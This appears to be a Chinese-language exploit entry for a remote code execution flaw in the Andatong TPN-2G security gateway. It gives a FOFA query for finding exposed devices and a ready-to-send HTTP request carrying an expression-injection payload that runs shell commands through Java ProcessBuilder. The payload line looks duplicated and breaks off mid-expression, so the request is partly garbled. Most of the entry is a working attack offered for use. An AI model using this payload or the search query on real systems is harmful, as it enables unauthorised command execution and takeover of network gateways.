A31-1安达通-TPN-2G安全网关-RCE

漏洞描述：

在安达通 TPN-2G 安全网关中发现了一处远程代码执行漏洞，攻击者可以通过admin_getLisence接口直接恶意的表达式执行shell命令，获取服务器权限。 经过分析与研判，该漏洞利用难度低，能够造成远程命令执行，建议尽快修复。

网站图片：

fofa语法：

title=“TPN-2G” || title=“SJW74”

漏洞复现：

带空格命令需要逗号分隔
payload：

GET /lan/admin_getLisence?redirect:${%23a%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22uname%22,%22-a%22}).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java.io.BufferedReader(%23b),%23d%3dnew%20char[51020],%23c.read(%23d),%23screen%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27).getWriter(),%23screen.println(%23d),%23screen.close()}%22%3Etest.action?redirect:${%23a%3dnew%20java.lang.ProcessBuilder(new%20java.lang.String[]{%22test%22}).start().getInputStream(),%23b%3dnew%20java.io.InputStreamReader(%23a),%23c%3dnew%20java HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close

效果图：